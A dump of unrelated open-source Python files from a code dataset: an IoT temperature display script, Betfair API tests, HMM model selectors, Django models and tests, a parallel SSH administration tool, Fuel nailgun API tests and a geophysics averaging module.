urllib.request.urlopen('http://google.com')\n globals()['connected'] = 1\n except:\n globals()['connected'] = 0\n # set cursor position\n lcd.setCursor(0,0)\n # display CPU temperature\n lcd.message( 'Temp: ' + get_tempF()+'\\n' )\n # display the time\n lcd.message( ' '+get_time_now() )\n sleep(0.1)\n\n########################################################################\n#Function: destroy()\n#Purpose: Safely errors out the program\n#Arguments:\n# none\n#Returns:\n# none\n########################################################################\ndef destroy():\n adc.close()\n GPIO.cleanup()\n lcd.clear()\n\n########################################################################\n# Initalization\n########################################################################\n# I2C address of the PCF8574 chip.\nPCF8574_address = 0x27\n# I2C address of the PCF8574A chip.\nPCF8574A_address = 0x3F\n# Create PCF8574 GPIO adapter.\ntry:\n mcp = PCF8574_GPIO(PCF8574_address)\nexcept:\n try:\n mcp = PCF8574_GPIO(PCF8574A_address)\n except:\n print ('I2C Address Error !')\n exit(1)\n# Create LCD, passing in MCP GPIO adapter.\nlcd = Adafruit_CharLCD(pin_rs=0, pin_e=2, pins_db=[4,5,6,7], GPIO=mcp)\nglobal emailTime\nglobal connected\nemailTime = 0\nconnected = 1\nif __name__ == '__main__':\n print ('Program is starting ... ')\n setup()\n try:\n loop()\n except KeyboardInterrupt:\n destroy()\n","repo_name":"Rothn12/Projects","sub_path":"BasicIOT-TempSensor/IOTtempSensor.py","file_name":"IOTtempSensor.py","file_ext":"py","file_size_in_byte":8355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70110567129","text":"import unittest\nfrom unittest import mock\nfrom requests.exceptions import ConnectionError\n\nfrom betfairlightweight.compat import json\nfrom betfairlightweight import APIClient\nfrom betfairlightweight.endpoints.historic import Historic\nfrom betfairlightweight.exceptions import APIError\n\n\nclass HistoricalTest(unittest.TestCase):\n def setUp(self):\n self.client = APIClient(\"username\", \"password\", \"app_key\", \"UK\")\n self.historic = Historic(self.client)\n\n def test_init(self):\n assert self.historic.client == self.client\n\n @mock.patch(\n \"betfairlightweight.endpoints.historic.Historic.request\",\n return_value=(mock.Mock(), mock.Mock(), 1.3),\n )\n def test_get_my_data(self, mock_request):\n self.historic.get_my_data()\n\n mock_request.assert_called_with(\"GetMyData\", {}, None)\n assert mock_request.call_count == 1\n\n @mock.patch(\n \"betfairlightweight.endpoints.historic.Historic.request\",\n return_value=(mock.Mock(), mock.Mock(), 1.3),\n )\n def test_get_collection_options(self, mock_request):\n params = {\n \"sport\": 1,\n \"plan\": 2,\n \"fromDay\": 3,\n \"fromMonth\": 4,\n \"fromYear\": 5,\n \"toDay\": 6,\n \"toMonth\": 7,\n \"toYear\": 8,\n }\n self.historic.get_collection_options(1, 2, 3, 4, 5, 6, 7, 8)\n\n mock_request.assert_called_with(\"GetCollectionOptions\", params, None)\n assert mock_request.call_count == 1\n\n @mock.patch(\n \"betfairlightweight.endpoints.historic.Historic.request\",\n return_value=(mock.Mock(), mock.Mock(), 1.3),\n )\n def test_get_data_size(self, mock_request):\n params = {\n \"sport\": 1,\n \"plan\": 2,\n \"fromDay\": 3,\n \"fromMonth\": 4,\n \"fromYear\": 5,\n \"toDay\": 6,\n \"toMonth\": 7,\n \"toYear\": 8,\n }\n self.historic.get_data_size(1, 2, 3, 4, 5, 6, 7, 8)\n\n mock_request.assert_called_with(\"GetAdvBasketDataSize\", params, None)\n assert mock_request.call_count == 1\n\n @mock.patch(\n \"betfairlightweight.endpoints.historic.Historic.request\",\n return_value=(mock.Mock(), mock.Mock(), 1.3),\n )\n def test_get_file_list(self, mock_request):\n params = {\n \"sport\": 1,\n \"plan\": 2,\n \"fromDay\": 3,\n \"fromMonth\": 4,\n \"fromYear\": 5,\n \"toDay\": 6,\n \"toMonth\": 7,\n \"toYear\": 8,\n }\n self.historic.get_file_list(1, 2, 3, 4, 5, 6, 7, 8)\n\n mock_request.assert_called_with(\"DownloadListOfFiles\", params, None)\n assert mock_request.call_count == 1\n\n # def test_download_file(self):\n # pass\n\n @mock.patch(\"betfairlightweight.endpoints.historic.check_status_code\")\n @mock.patch(\"betfairlightweight.endpoints.historic.Historic.headers\")\n @mock.patch(\"betfairlightweight.baseclient.requests.post\")\n def test_request(self, mock_post, mock_headers, mock_check_status_code):\n params = {\"test\": \"me\"}\n method = \"test\"\n url = \"https://historicdata.betfair.com/api/test\"\n\n mock_response = mock.Mock()\n mock_response.content = \"{}\".encode(\"utf-8\")\n mock_post.return_value = mock_response\n\n self.historic.request(method=method, params=params, session=None)\n\n mock_post.assert_called_with(\n url,\n headers=mock_headers,\n data=json.dumps(params),\n timeout=(self.historic.connect_timeout, self.historic.read_timeout),\n )\n assert mock_post.call_count == 1\n assert mock_check_status_code.call_count == 1\n\n @mock.patch(\"betfairlightweight.endpoints.historic.Historic.headers\")\n @mock.patch(\"betfairlightweight.baseclient.requests.post\")\n def test_request_error(self, mock_post, mock_headers):\n params = {\"test\": \"me\"}\n method = \"test\"\n mock_post.side_effect = ConnectionError()\n with self.assertRaises(APIError):\n self.historic.request(params=params, method=method, session=None)\n\n mock_post.side_effect = ValueError()\n with self.assertRaises(APIError):\n self.historic.request(params=params, method=method, session=None)\n\n # @mock.patch('betfairlightweight.endpoints.historical.check_status_code')\n # @mock.patch('betfairlightweight.endpoints.historical.Historical.headers')\n # @mock.patch('betfairlightweight.baseclient.requests.post')\n # def test_request_json_error(self, mock_post, mock_headers, mock_check_status_code):\n # params = {'test': 'me'}\n # method = 'test'\n # url = 'https://historicdata.betfair.com/api/test'\n #\n # response = mock.Mock()\n # mock_post.return_value = response\n # response.json.side_effect = ValueError()\n #\n # with self.assertRaises(InvalidResponse):\n # self.historical.request(params=params, method=method, session=None)\n\n def test_headers(self):\n assert self.historic.headers == {\n \"ssoid\": self.client.session_token,\n \"Content-Type\": \"application/json\",\n }\n\n def test_url(self):\n assert self.historic.url == \"https://historicdata.betfair.com/api/\"\n","repo_name":"betcode-org/betfair","sub_path":"tests/test_historical.py","file_name":"test_historical.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":391,"dataset":"github-code","pt":"31"} +{"seq_id":"4827071086","text":"import math\nimport statistics\nimport warnings\n\nimport numpy as np\nfrom hmmlearn.hmm import GaussianHMM\nfrom sklearn.model_selection import KFold\nfrom asl_utils import combine_sequences\n\n\nclass ModelSelector(object):\n '''\n base class for model selection (strategy design pattern)\n '''\n\n def __init__(self, all_word_sequences: dict, all_word_Xlengths: dict, this_word: str,\n n_constant=3,\n min_n_components=2, max_n_components=10,\n random_state=14, verbose=False):\n self.words = all_word_sequences\n self.hwords = all_word_Xlengths\n self.sequences = all_word_sequences[this_word]\n self.X, self.lengths = all_word_Xlengths[this_word]\n self.this_word = this_word\n self.n_constant = n_constant\n self.min_n_components = min_n_components\n self.max_n_components = max_n_components\n self.random_state = random_state\n self.verbose = verbose\n\n def select(self):\n raise NotImplementedError\n\n def base_model(self, num_states):\n # with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n # warnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n try:\n hmm_model = GaussianHMM(n_components=num_states, covariance_type=\"diag\", n_iter=1000,\n random_state=self.random_state, verbose=False).fit(self.X, self.lengths)\n if self.verbose:\n print(\"model created for {} with {} states\".format(self.this_word, num_states))\n return hmm_model\n except:\n if self.verbose:\n print(\"failure on {} with {} states\".format(self.this_word, num_states))\n return None\n\n\nclass SelectorConstant(ModelSelector):\n \"\"\" select the model with value self.n_constant\n\n \"\"\"\n\n def select(self):\n \"\"\" select based on n_constant value\n\n :return: GaussianHMM object\n \"\"\"\n best_num_components = self.n_constant\n return self.base_model(best_num_components)\n\n\nclass SelectorBIC(ModelSelector):\n \"\"\" select the model with the lowest Bayesian Information Criterion(BIC) score\n\n http://www2.imm.dtu.dk/courses/02433/doc/ch6_slides.pdf\n Bayesian information criteria: BIC = -2 * logL + p * logN\n \"\"\"\n def select(self):\n \"\"\" select the best model for self.this_word based on\n BIC score for n between self.min_n_components and self.max_n_components\n\n :return: GaussianHMM object\n \"\"\"\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n best_model = None\n base_val = float(\"inf\")\n\n for n in range(self.min_n_components, self.max_n_components + 1):\n X = self.X\n length = self.lengths\n try:\n # gen the model\n model = GaussianHMM(n_components=n, n_iter=1000).fit(X, length)\n logL = model.score(X, length)\n\n # print(self.lengths)\n\n summer = 0\n for e in length:\n summer += e\n\n ## p = n² + 2*n*N_d_points - 1\n p = n**2 + 2*n*len(X[0]) - 1\n score = -2*logL + p*math.log(summer)\n if base_val > score:\n best_model = model\n base_val = score\n\n except: ## Occurs when a worng number is accessed\n pass\n\n return best_model\n\n\nclass SelectorDIC(ModelSelector):\n ''' select best model based on Discriminative Information Criterion\n\n Biem, Alain. \"A model selection criterion for classification: Application to hmm topology optimization.\"\n Document Analysis and Recognition, 2003. Proceedings. Seventh International Conference on. IEEE, 2003.\n http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.58.6208&rep=rep1&type=pdf\n https://pdfs.semanticscholar.org/ed3d/7c4a5f607201f3848d4c02dd9ba17c791fc2.pdf\n DIC = log(P(X(i)) - 1/(M-1)SUM(log(P(X(all but i))\n '''\n\n def select(self):\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\n best_model = None\n group = []\n fit_group = []\n buff = float(\"-inf\")\n\n ## Gen every model and it's score\n for n in range(self.min_n_components, self.max_n_components + 1):\n X = self.X\n length = self.lengths\n word_logL = 0\n others_logL = 0\n \n try:\n model = GaussianHMM(n_components=n, n_iter=1000).fit(X, length)\n except:\n continue\n\n ## Built with the reviewer support\n for w in self.words:\n x,l = self.hwords[w]\n logL = 0\n\n ## Compute the logL for the word\n try:\n logL = model.score(x, l)\n except:\n pass\n\n ## Set the logL to the DIC correct place\n if w == self.this_word:\n word_logL = logL\n else:\n others_logL += logL\n\n ## Compute the DIC score for the model\n scoreDIC = word_logL - float(others_logL)/float(len(self.words) - 1)\n group.append((model, scoreDIC))\n\n ## Select between every model the best one\n for model, val in group:\n if val > buff:\n best_model = model\n buff = val\n\n return best_model\n\n\nclass SelectorCV(ModelSelector):\n ''' select best model based on average log Likelihood of cross-validation folds\n\n '''\n def select(self):\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\n best_model = None\n best_val = float(\"-inf\")\n\n # split_method = KFold(n_splits=len(self.sequences))\n split_method = KFold(n_splits=min(3, len(self.sequences)))\n for n in range(self.min_n_components, self.max_n_components + 1): \n sum_val = 0\n\n base_model = GaussianHMM(n_components=n, n_iter=1000)\n\n for cv_train_idx, cv_test_idx in split_method.split(self.sequences):\n # print(\"Train fold indices:{} Test fold indices:{}\".format(cv_train_idx, cv_test_idx)) # view indices of the folds\n try:\n ## Fit the model\n X, length = combine_sequences(cv_train_idx, self.sequences)\n model = base_model.fit(X, length)\n\n ## Test the model\n X, length = combine_sequences(cv_test_idx, self.sequences)\n logL = model.score(X, length)\n\n sum_val += logL\n \n except: ## Occurs when some strange n is passed as a param\n pass\n\n media = float(sum_val)/float(len(self.sequences))\n if best_val < media:\n best_model = model\n best_val = media\n\n return best_model\n","repo_name":"MiniMarvin/ai_studies","sub_path":"AIND-Recognizer/my_model_selectors.py","file_name":"my_model_selectors.py","file_ext":"py","file_size_in_byte":7002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17315110945","text":"from django.utils.dateparse import parse_date\nfrom datetime import timedelta\n\n\n# Create a function to handle date filtering\ndef filter_by_date(queryset, initialdate, finaldate):\n if initialdate:\n initialdate = parse_date(initialdate)\n if finaldate:\n finaldate = parse_date(finaldate)\n\n if initialdate and finaldate:\n # Correct usage of range for filtering between two dates\n return queryset.filter(created_at__range=[initialdate, finaldate])\n\n elif initialdate:\n # Filter from initialdate to an open-ended future\n return queryset.filter(created_at__gte=initialdate)\n\n elif finaldate:\n # Filter up to and including finaldate\n return queryset.filter(created_at__lte=finaldate)\n\n return queryset\n\n\nfilter_dict = {\n \"name\": \"laboratory_name\",\n \"location\": \"location\",\n \"director\": \"director_name\",\n \"recent_first\": \"-created_at\",\n \"recent_last\": \"created_at\",\n}\n\nfilter_dict_member = {\n \"name\": \"name\",\n \"laboratory\": \"laboratory_name\",\n \"role\": \"role\",\n \"recent_first\": \"-created_at\",\n \"recent_last\": \"created_at\",\n}\n","repo_name":"juanmggb/backend_fermapp_experiment","sub_path":"users/utilis/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23842495648","text":"import datetime\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Projects(models.Model):\n \"\"\" Проект \"\"\"\n image_project = models.ImageField()\n title = models.CharField(max_length=25)\n status = models.BooleanField(default=False)\n supervisor = models.ForeignKey(User, related_name='supervisor', on_delete=models.CASCADE)\n developers = models.ManyToManyField(User, related_name='developers')\n description = models.TextField('Описание', max_length=150, default=True)\n start = models.DateField('Начало проекта')\n end = models.DateField('Конец проекта')\n count_procents_done = models.PositiveIntegerField(default=0)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Проект'\n verbose_name_plural = 'Проекты'\n\n\nclass Tasks(models.Model):\n \"\"\" Задачи проекта \"\"\"\n title_task = models.CharField(max_length=50)\n date = models.DateTimeField(auto_now=datetime.datetime.now())\n project = models.ForeignKey(Projects, on_delete=models.CASCADE, related_name=\"task\")\n done = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title_task\n\n class Meta:\n verbose_name = 'Задача'\n verbose_name_plural = 'Задачи'\n\n\nclass Comments(models.Model):\n \"\"\" Комментарий \"\"\"\n text_title = models.TextField(\"Текст\", max_length=250)\n parent = models.ForeignKey('self', verbose_name='Родитель', on_delete=models.SET_NULL,\n blank=True, null=True, related_name=\"children\")\n project = models.ForeignKey(Projects, verbose_name=\"проект\", on_delete=models.CASCADE, related_name=\"comment\")\n\n def __str__(self):\n return self.text_title\n\n class Meta:\n verbose_name = 'Комментарий'\n verbose_name_plural = 'Комментарии'\n\n","repo_name":"JustSorvigolova/Progect-Manager-Rest-Api","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21673136988","text":"import sgc\nimport multiprocessing as mp\n# import json\nimport argparse\nimport os\nimport re\n\n\n\n#Process argument passed to the script\nparser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help='servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help='commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')\n\noptions = parser.parse_args()\n\n#Exit if input file is zero\nif os.path.getsize(options.file) == 0:\n print(\"Error: server list file is empty\")\n exit(2)\n\n#Process the input file and store the server in list variable servers\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\n\n#Exit the script if the servers list is empty\nif not servers:\n print(\"Error: server list file is empty\")\n exit(2)\n\n#Process the commands passed into the script\ncommands = []\n\nif options.commands and re.match(r'[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n #Exit the script if command list is empty\n if not commands:\n print(\"Error: command list is empty\")\n parser.print_help()\n exit(2)\n\nif options.script:\n commands = ['/tmp/'+os.path.basename(options.script)]\n\n#servers = ['localhost', 'centos6web', 'fedora.kannan.lab', '127.0.0.1', '127.0.0.2', '127.0.0.3', '127.0.0.4',\n# '127.0.0.100', '127.0.0.200', '127.0.0.150', '127.0.0.10', '127.0.0.20', '127.0.0.30']\n# servers = ['centos6web', 'fedora.kannan.lab']\n# commands = ('sudo shutdown -h 0',)\n# commands = ('uptime', 'uname -a', 'sudo fdisk -l')\nqueue = mp.Queue()\ndef worker(server, commands):\n # print(mp.current_process().name)\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n\n # print(\"Connected to server {}\".format(server))\n # else:\n # print(\"Unable to connect to server {}\\n{}\".format(server, session.connection_error))\n if session.ping == 'Alive':\n session.connect()\n # print(session.connection)\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'] = \"Error: the script location {} not exists\".format(options.script)\n print(\"Error: the script location {} not exists\".format(options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = ('/tmp/'+file,)\n session.execute(('/bin/chmod a+x /tmp/'+file, ))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n\n queue.put(output)\n # if output != None:\n # print(\"Server {}\".format(server))\n # for key in output:\n # print(key, output[key])\n\n# pool = mp.Pool(processes=mp.cpu_count())\n# result = pool.map_async(worker, servers)\n# for item in result.get():\n# print(json.dumps(item, indent=4))\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children() :\n if not queue.empty():\n item = queue.get()\n\n if item['commands'] == 'Down':\n print(\"Server: {} : Unable to ping\".format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print(\"Server: {} : {}\".format(item['server'], item['commands']))\n continue\n\n print(\"Server: {}\".format(item['server']))\n for command in commands:\n if item['commands'][command][0] != \"\":\n if options.script:\n print(\"Output of Command: {}\".format(options.script))\n else:\n print(\"Output of Command: {}\".format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != \"\":\n print(\"Error occurred on command: {}\".format(command))\n print(item['commands'][command][1])\n print(\"**************************************************************************\")\n","repo_name":"techiekannanv/Python","sub_path":"pyexec.py","file_name":"pyexec.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6693178062","text":"import shutil\nimport tempfile\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom posts.models import Group, Post, Comment\nfrom posts.forms import PostForm\n\nUser = get_user_model()\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass PostFormTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание'\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.user = User.objects.create_user(username='Shershon')\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n\n def test_create_post(self):\n \"\"\"Проверка создания нового поста.\"\"\"\n posts_count = Post.objects.count()\n small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n uploaded = SimpleUploadedFile(\n name='small.gif',\n content=small_gif,\n content_type='image/gif'\n )\n post_for_test = {\n 'text': 'Созданный тестовый пост',\n 'group': self.group.id,\n 'image': uploaded\n }\n response = self.authorized_client.post(reverse('posts:post_create'),\n data=post_for_test,\n follow=True)\n self.assertEqual(Post.objects.count(), posts_count + 1)\n self.assertTrue(Post.objects.filter(\n text=post_for_test['text'],\n group=self.group.id,\n author=self.user,\n image='posts/small.gif'\n ).exists())\n self.assertRedirects(response, reverse(\n 'posts:profile', kwargs={'username': self.user.username}))\n\n def test_create_post_form_field_error(self):\n response = self.authorized_client.get(reverse('posts:post_create'))\n form_response = response.context.get('form')\n self.assertIsInstance(form_response, PostForm)\n\n def test_upload_other_file_instead_of_image(self):\n video = SimpleUploadedFile('file.mp4', b'content',\n content_type='video/mp4')\n post_video = {\n 'text': 'Попытка загрузить видео вместо картинки',\n 'image': video\n }\n response = self.authorized_client.post(reverse('posts:post_create'),\n data=post_video,\n follow=True)\n self.assertFormError(response, 'form', 'image',\n ('Загрузите правильное изображение. '\n 'Файл, который вы загрузили, поврежден '\n 'или не является изображением.'))\n\n def test_create_post_without_group_and_image(self):\n \"\"\"Проверка создания нового поста без указания группы и изображения.\"\"\"\n posts_count = Post.objects.count()\n post_without = {\n 'text': 'Созданный тестовый пост',\n 'group': '',\n 'image': ''\n }\n response = self.authorized_client.post(reverse('posts:post_create'),\n data=post_without,\n follow=True)\n self.assertEqual(Post.objects.count(), posts_count + 1)\n self.assertTrue(Post.objects.filter(\n text=post_without['text'],\n author=self.user\n ).exists())\n self.assertRedirects(response, reverse(\n 'posts:profile', kwargs={'username': self.user.username}))\n\n def test_edit_post(self):\n \"\"\"Проверка редактирования поста автором.\"\"\"\n self.post = Post.objects.create(\n text='Тестовый пост',\n author=self.user\n )\n posts_count = Post.objects.count()\n edited_post = {\n 'text': 'Отредактированный тестовый пост',\n 'group': self.group.id\n }\n response = self.authorized_client.post(\n reverse('posts:post_edit', kwargs={'post_id': self.post.id}),\n data=edited_post, follow=True)\n self.assertEqual(Post.objects.count(), posts_count)\n self.assertEqual(Post.objects.get(\n pk=self.post.id).text, edited_post['text'])\n self.assertRedirects(response, reverse(\n 'posts:post_detail', kwargs={'post_id': self.post.id}))\n\n def test_create_comment(self):\n \"\"\"Проверка создания нового комментария\n авторизованным пользователем.\n \"\"\"\n self.post = Post.objects.create(\n text='Тестовый пост',\n author=self.user\n )\n comments_count = Comment.objects.count()\n comment_for_test = {\n 'text': 'Тестовый комментарий',\n }\n response = self.authorized_client.post(\n reverse('posts:add_comment', kwargs={'post_id': self.post.id}),\n data=comment_for_test, follow=True)\n self.assertEqual(Comment.objects.count(), comments_count + 1)\n self.assertTrue(Comment.objects.filter(\n text=comment_for_test['text']).exists())\n self.assertRedirects(response, reverse(\n 'posts:post_detail', kwargs={'post_id': self.post.id}))\n","repo_name":"shershlina/puzzle_project","sub_path":"puzzlife/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":6316,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6080576121","text":"from mock import patch\nfrom oslo_serialization import jsonutils\n\nfrom nailgun.test.base import BaseAuthenticationIntegrationTest\nfrom nailgun.utils import reverse\n\n\nclass TestPublicHandlers(BaseAuthenticationIntegrationTest):\n\n def test_node_agent_api(self):\n self.env.create_node(\n api=False,\n status='provisioning',\n meta=self.env.default_metadata()\n )\n node_db = self.env.nodes[0]\n resp = self.app.put(\n reverse('NodeAgentHandler'),\n jsonutils.dumps(\n {'mac': node_db.mac,\n 'status': 'discover', 'manufacturer': 'new'}\n ),\n headers=self.default_headers\n )\n self.assertEqual(resp.status_code, 200)\n\n resp = self.app.post(\n reverse('NodeCollectionHandler'),\n jsonutils.dumps({'mac': self.env.generate_random_mac(),\n 'status': 'discover'}),\n headers=self.default_headers)\n\n self.assertEqual(201, resp.status_code)\n\n def test_version_api(self):\n resp = self.app.get(\n reverse('VersionHandler'),\n headers=self.default_headers\n )\n self.assertEqual(200, resp.status_code)\n\n @patch('nailgun.api.v1.handlers.version.utils.get_fuel_release_versions')\n def test_500_no_html_dev(self, handler_get):\n exc_text = \"Here goes an exception\"\n handler_get.side_effect = Exception(exc_text)\n resp = self.app.get(\n reverse('VersionHandler'),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(500, resp.status_code)\n self.assertIn(exc_text, resp.body)\n self.assertIn(\"Traceback\", resp.body)\n self.assertNotIn(\"html\", resp.body)\n\n @patch('nailgun.api.v1.handlers.version.utils.get_fuel_release_versions')\n def test_500_no_html_production(self, handler_get):\n exc_text = \"Here goes an exception\"\n handler_get.side_effect = Exception(exc_text)\n with patch('nailgun.settings.settings.DEVELOPMENT', 0):\n resp = self.app.get(\n reverse('VersionHandler'),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(500, resp.status_code)\n self.assertEqual(exc_text, resp.body)\n","repo_name":"thomasgoirand/fuel-nailgun","sub_path":"nailgun/test/integration/test_public_api.py","file_name":"test_public_api.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"451767346","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .libmagic import anelprof, cylSder, cylZder, phideravg, symmetrize, \\\n progressbar\nfrom .plotlib import cut\nfrom magic import MagicGraph, MagicSetup\nfrom magic.setup import labTex, buildSo\nfrom scipy.ndimage import map_coordinates\nfrom scipy.interpolate import interp1d\nimport os\nimport pickle\n\nif buildSo:\n try:\n from magic.cylavg import *\n zavgMode = 'f2py'\n except ImportError:\n zavgMode = 'python'\nelse:\n zavgMode = 'python'\n\ndef sph2cyl_plane(data, rad, ns):\n \"\"\"\n This function extrapolates a phi-slice of a spherical shell on\n a cylindrical grid\n\n >>> # Read G_1.test\n >>> gr = MagicGraph(ivar=1, tag='test')\n >>> # phi-average v_\\phi and s\n >>> vpm = gr.vphi.mean(axis=0)\n >>> sm = gr.entropy.mean(axis=0)\n >>> # Interpolate on a cylindrical grid\n >>> Z, S, outputs = sph2cyl_plane([vpm, sm], gr.radius, 512, 1024)\n >>> vpm_cyl, sm_cyl = outputs\n\n :param data: a list of 2-D arrays [(ntheta, nr), (ntheta, nr), ...]\n :type data: list(numpy.ndarray)\n :param rad: radius\n :type rad: numpy.ndarray\n :param ns: number of grid points in s direction\n :type ns: int\n :returns: a python tuple that contains two numpy.ndarray and a list (S,Z,output).\n S[nz,ns] is a meshgrid that contains the radial coordinate.\n Z[nz,ns] is a meshgrid that contains the vertical coordinate.\n output=[arr1[nz,ns], ..., arrN[nz,ns]] is a list of the interpolated\n array on the cylindrical grid.\n :rtype: tuple\n \"\"\"\n ntheta, nr = data[0].shape\n theta = np.linspace(0., np.pi, ntheta)\n nz = 2*ns\n\n if zavgMode == 'f2py':\n\n cylRad = np.linspace(0., rad[0], ns)\n output = []\n for dat in data:\n Z, dat_cyl = sph_to_cyl(dat, rad, cylRad, theta)\n output.append(dat_cyl)\n\n return cylRad, Z, output\n\n else:\n\n radius = rad[::-1]\n\n theta = np.linspace(0., np.pi, ntheta)\n\n Z, S = np.mgrid[-radius.max():radius.max():nz*1j,0:radius.max():ns*1j]\n\n new_r = np.sqrt(S**2+Z**2).ravel()\n new_theta = np.arctan2(S, Z).ravel()\n ir = interp1d(radius, np.arange(len(radius)), bounds_error=False)\n it = interp1d(theta, np.arange(len(theta)), bounds_error=False)\n\n new_ir = ir(new_r)\n new_it = it(new_theta)\n new_ir[new_r > radius.max()] = len(radius)-1.\n new_ir[new_r < radius.min()] = 0.\n\n coords = np.array([new_it, new_ir])\n\n output = []\n for dat in data:\n dat_cyl = map_coordinates(dat[:, ::-1], coords, order=3)\n dat_cyl[new_r > radius.max()] = 0.\n dat_cyl[new_r < radius.min()] = 0.\n dat_cyl = dat_cyl.reshape((nz, ns))\n output.append(dat_cyl)\n\n return S, Z, output\n\nif zavgMode == 'f2py':\n\n def zavg(input, radius, ns, minc, save=True, filename='vp.pickle',\n normed=True, colat=None):\n \"\"\"\n This function computes a z-integration of a list of input arrays \n (on the spherical grid). This works well for 2-D (phi-slice) arrays.\n In case of 3-D arrays, only one element is allowed (too demanding\n otherwise).\n\n :param input: a list of 2-D or 3-D arrays\n :type input: list(numpy.ndarray)\n :param radius: spherical radius\n :type radius: numpy.ndarray\n :param ns: radial resolution of the cylindrical grid (nz=2*ns)\n :type ns: int\n :param minc: azimuthal symmetry\n :type minc: int\n :param save: a boolean to specify if one wants to save the outputs into\n a pickle (default is True)\n :type save: bool\n :param filename: name of the output pickle when save=True\n :type filename: str\n :param normed: a boolean to specify if ones wants to simply integrate \n over z or compute a z-average (default is True: average)\n :type normed: bool\n :param colat: an optional array containing the colatitudes\n :type colat: numpy.ndarray\n :returns: a python tuple that contains two numpy.ndarray and a list\n (height,cylRad,output) height[ns] is the height of the\n spherical shell for all radii. cylRad[ns] is the cylindrical\n radius. output=[arr1[ns], ..., arrN[ns]] contains\n the z-integrated output arrays.\n :rtype: tuple\n \"\"\"\n ro = radius[0]\n ri = radius[-1]\n cylRad = np.linspace(ro, 0., ns)\n if len(input[0].shape) == 3:\n ntheta = input[0].shape[1]\n elif len(input[0].shape) == 2:\n ntheta = input[0].shape[0]\n if colat is None:\n theta = np.linspace(0., np.pi, ntheta)\n else:\n theta = colat\n\n height = np.zeros_like(cylRad)\n height[cylRad >= ri] = 2.*np.sqrt(ro**2-cylRad[cylRad >= ri]**2)\n height[cylRad < ri] = 2.*(np.sqrt(ro**2-cylRad[cylRad < ri]**2)\n -np.sqrt(ri**2-cylRad[cylRad < ri]**2))\n\n if len(input[0].shape) == 3:\n nphi = input[0].shape[0]\n phi = np.linspace(0., 2.*np.pi/minc, nphi)\n output = np.zeros((nphi, ns), dtype=input[0].dtype)\n 